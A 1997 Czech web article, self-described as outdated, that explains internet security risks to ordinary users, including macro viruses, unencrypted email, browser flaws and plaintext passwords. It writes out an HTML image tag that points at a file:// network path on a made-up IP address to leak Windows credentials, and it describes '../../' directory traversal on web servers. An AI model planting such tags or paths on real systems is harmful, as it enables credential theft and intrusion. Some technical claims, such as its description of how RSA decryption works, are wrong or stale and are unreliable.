Je brouzdání Internetem opravdu bezpečné?
(ver 1.2)

- POZOR -

Tato stránka nebyla dlouhou dobu updatovaná a informace zde uvedené nemusí již být pravdivé. Nehledě na to, že můj názor se na některé zde uvedené věci změnil...

"Spore osvetlena mistnost. Tezke, zlovestne ticho podbarvuje jen nevtiravy sum ventilatoru. Ostrizi oci sleduji sebemensi pohyb na sinave zarici plose monitoru. Staccato uderu do klavesnice trha atmosferu ticha. Vedeny zkusenou rukou operatora putuji data..." Takto nejak vypada povidka HACKER. Vypada to tak i v realnem svete? Muzu vam rict, ze ano.Dukazy nam o tom podavaji nescetna mnozstvi objevenych (a nekdy i zneuzitych) chyb v ruznych browserech, mailerech, nebo dokonce i v samotnych operacnich systemech. Aktivity hackeru neznaji meze.

Na internetu na vas ciha nebezpeci prakticky vsude. I takovy email (ac se to zda neuveritelne) muze skryvat bezpecnostni diru. Nejvetsi problem je vetsinou v obsluze. Ta (jakozto laik) dela prirozene chyby a zneprijemnuje zivot sobe, mnohdy i jinym uzivatelum. V dnesni dobe mam dojem, ze chyby jsou spis v programech. Nejsem nijak zaujaty proti firme Microsoft, ale zda se mi, ze jejich software je stale nebezpecnejsi. Zde popisovane problemy se ve vetsine pripadu tykaji prave firmy Microsoft. Vsechny nize uvedene informace vam podavam bez zaruky, vsechny jsem sice zkousel,ale to neznamena, ze budou fungovat i vam ;-). Take nemuzu tvrdit, ze jsem na vsechno prisel ja sam. Prave naopak, vetsinu jsem slysel nebo cetl.V zadnem pripade neberte tento clanek jako nabadajici lidi delat veci nize popsane. Myslim, ze prave naopak. Dokud se bude o problemech mlcet, nikdo je take nebude resit a uzivatele budou zit v domeni, ze brouzdani je zcela bezpecne. Mylim se? Proc tedy Microsoft stale neopravil tyto chyby???

Zacneme e-mailem, ktery je nejstarsi. Jiz delsi dobu se po internetu siri zpravy informujici uzivatele, ze pokud precte email se subjectem Good Times, bude jeho pevny disk zformatovan, a ze ma tento email poslat vsem svym pratelum, na kterych mu zalezi. Takoveto viry neexistuji. Ovsem muze vam prijit email, ke kteremu bude pripojen dokument, rekneme, ze ve Wordu. Tento dokument si budete chtit precist, kliknete na nej (nebo se vam Word spusti automaticky,...), nacte se Word a vy ctete. Pokud jste nekdy cetli o makrovirech, je vam jasne co se muze stat. Pokud ne, vezte, ze jde o jistou formu viru, ktery se siri v podobe maker pripojenych napriklad k dokumenum z Wordu. Tento makrovirus muze byt samozrejme i v takovemto souboru. Jak se tedy chranit??? Novejsi verze Wordu jiz umi uzivatele varovat, pokud nalezne v dokumentu makra. Ctete tedy tyto varovani a ridte se jimi. Pokud nejste vyvolenymi a mate Word, ktery bez ptani provede vsechna makra, musite si davat pozor, od koho budete cist tyto dokumenty. Pokud Vam vas postovni program automaticky spusti Word (nebo jiny program, ktery umi pracovat s makry), radsi jej prestante pouzivat.

Kdyz jsme byli u emailu, musim vam povedet jeste jednu vec. Kazdy email se posila v nekodovane podobe, tzn kdo ho na ceste potka, muze si jej precist. V nekterych pripadech se mail posila od vas k serveru, pote ze serveru vetsinou na nejaky "vetsi server" vaseho providera, pak na cilovy server a odtud k adresatovi. Uz nekolikrat jsem ale videl, ze email putoval skoro po celem svete. Na techto "mezistanicich" si muze tedy spravce (nebo kdokoli kdo ma k serveru a datum pristup) email precist. Pokud se vam to nelibi, muzete kodovat emaily, napriklad programem PGP, ktery se velmi rozsiril. Bohuzel nejvice v USA, u nas je uzivatelu PGP zalostne malo. Bezpecnost takto zakodovanych emailu je temer 100%, protoze PGP pouziva RSA. RSA je sifra, kterou je mozne rozlustit jen se znalosti dvou klicu - tajneho pisatelova kilce a verejneho klice adresata. Vzhledem k tomu, ze vas tajny klic nikdo nema (pokud ho nekomu nevenujete, nebo vam jej neukradne...), rozlusteni takto zasifrovaneho emailu je prakticky nemozne.

Nase dalsi zastavka bude u Microsoft Internet Exploreru. Ten ma neprijemnou vlastnost, ze bez ptani otevre nektere typy souboru nactenych z internetu. Nejdrive to byly soubory, ve kterych se dal nastavit prikaz, ktery se ma spustit (tedy napriklad format c:,...). Tyto soubory maji extenzi bud .ISP, .URL, nebo .LNK. Microsoft nastesti tuto chybu jiz opravil (ovsem vy muzete mit starsi verzi MSIE,...). Nato byla objevena dalsi chyba. Pri downloadu .REG souboru se tento soubor neulozi na disk, ale spusti se registry editor a zacne importovat. Pro neznale musim objasnit nekolik veci. Registry editor je program, ktery umoznuje prohlizet konfiguracni databazi Windows 95 (nebo NT). V teto databazi jsou umisteny vsechny informace o konfiguraci pocitace, aplikacich, jaky ovladac se ma kdy nahrat,... Takovyto importovany .REG soubor vam tedy muze zpusobit v lepsim pripade problemy s hardwarem, v horsim uplne znicit Windows, nebo data.Musim vas jeste upozornit, ze tento soubor se muze nahrat take automaticky, mezitim co vy si budete prohlizet stranku, na ktere je prikaz na nanahrati tohoto souboru. (Vetsinou se to dela pomoci JavaScriptu - prikazem setTimeout(), nebo pomoci HTML tagu META) Je mozne (a v to doufam), ze v dobe, kdy budete tento clanek cist, bude jiz tato chyba opravena. Proto prosim updatujte MSIE, nebo pouzivejte jiny browser (napriklad Netscape Communicator, ale ten ma teke bezpecnostni diry).

Rovnou budeme pokracovat dalsi zhavou oblasti, a tou je Java. Java je programovaci jazyk, ktery se pozuiva na internetu. Na strankach se objevuje vetsinou jako ruzna tlacitka, ktera se meni jak na ne najizdite mysi, jako hra, LEDkovy displej na kterem bezi text,... Java se vyuzije prakticky vsude. Vsechno dobre je i k necemu spatne. Touto druhou stranou Javy je bezpecnost. Firma Sun (ktera Javu navrhla) se snazi tyto chyby odstranit, zatim uspesne. Je jen tezko odhadnout, jestli jsou v Jave nejake dalsi chyby, ci ne.

JavaScript, casto zamenovany s Javou, je dalsi derave misto.Tento jazyk, puvodne pojmenovany LiveScript, pote z komercnich duvodu prejmenovany na JavaScript, mel a ma take velke mnozstvi bezpecnostnich der. V tomto skriptu jde napriklad velmi jednoduse napsat "zatuhnuti" pocitace nebo browseru, ci jine vtipy, ktere dokazi zneprijemnit uzivateli zivot. Vzhledem k tomu, ze nikde jsem nevidel kompletni popis tohoto jazyka, nemohu potvrdit, zda jdou napsat i zakernejsi veci (napriklad mazani dat na disku,..). Uz jsem slysel od nekolika lidi, ze to jde. vetsina browseru podporujicich JavaScript ma moznost zakazat pouziti tohoto jazyka. Pokud chcete mit vzdy verzi s co nejmensim poctem bezpecnostnich der, stahujte si patche.

Nyni se podivame na chybu, ktera se vyskytuje na WindowsNT (pry i na Windows95, ale nezkousel jsem). Kdyz do HTML dokumentu uvedete tag <IMG SRC="file:////194.199.120.49/test.gif"> (IP adresu jsem si vymyslel), prohlizec vlozi do dokumentu obrazek file:////194.199.120.49/test.gif. Odkaz muzeme rozlozit jako lokalni soubor //194.199.120.49/test.gif. Browser preda Windows odkaz na tento soubor. Windows si nahradi normalni lomitka lomitky zpetnymi, nyni to bude vypadat takto: \\194.199.120.49\test.gif. Toto jiz zkusenejsim uzivatelum pripomina napriklad zapis \\JIRKA\soubor.txt - to je odkaz na soubor.txt ulozeny na pocitaci JIRKA. Windows se tedy pokusi spojit s pocitacem \\194.199.120.49 a pozaduji na nem soubor \test.gif. Podstata problemu je v tom, ze Windows ocekavaji, ze tento pocitac je v lokalni siti a mate tedy stejne heslo, jako na vasem pocitaci. Poslou tedy s pozadavkem vase jmeno a heslo. Pokud bude na tomto serveru bezet program, ktery ulozi prijate heslo a jmeno uzivatele a vam zpet odesle nejaky hezky obrazek, mate smulu. Chyba se projevuje prakticky ve vsech browservech, ale jen pod WindowsNT (nebo 95).

Nekteri odvaznejsi uzivatele maji dokonce vlastni WebServer. Nektere WebServery mely (nektere mozna stale maji...) v sobe pomerne zaludnou chybu. Rekneme, ze mate data ulozeny v adresari C:\WEBSITE\. Pokud se tedy budete odkazovat na soubor www.neco.cz/test/test.htm, bude to prelozeno jako C:\WEBSITE\TEST\TEST.HTM. Pokud napriklad uvedete www.neco.cz/test/../../ browser si to vylozi jako C:\WEBSITE\TEST\..\..\. Tato cesta se da prepsat ale jako C:\, protoze .. znamena nadrazeny adresar. Mily prunikar tedy muze brouzdat po vasem disku, prohlizet data,... Nastest je atto chyba jiz velmi stara a 99% serveru ji nema. Pokud budete instalovat nejaky starsi WebServer, radsi si zkontrolujte, zda nema tuto neprijemnou vlastnost.

Kodovani hesel? Na tuto otazku je jednoducha odpoved: Skoro nulove. Vetsina bezne pouzivanych protokolu (HTTP,POP3,IRC,...) hesla vubec nekoduji. Novejsi verze jiz maji ve specifikaci kodovani, ale to se nerozsirilo, takze se nepouziva. Nedivte se tedy, kdyz vam bude kolega cist vasi postu, i kdyz jste pouzili sebeslozitejsi heslo.

Snad ani nemusim pripominat, ze si muzete kdykoliv stahnout z inetu zavirovany soubor, takze je vhodne vse, co stahnete, proscanovat. Existuji pluginy do browseru, ktere to udelaji za vas.

Co dodat na konec? Doufam,ze tento clanek vas alespon trochu zasvetil do bezpecnosti na internetu, ktera jak vidite neni na dobre urovni.


Podívejte se také na:
Copyright (c) 1997 Martin Hinner, All rights reserved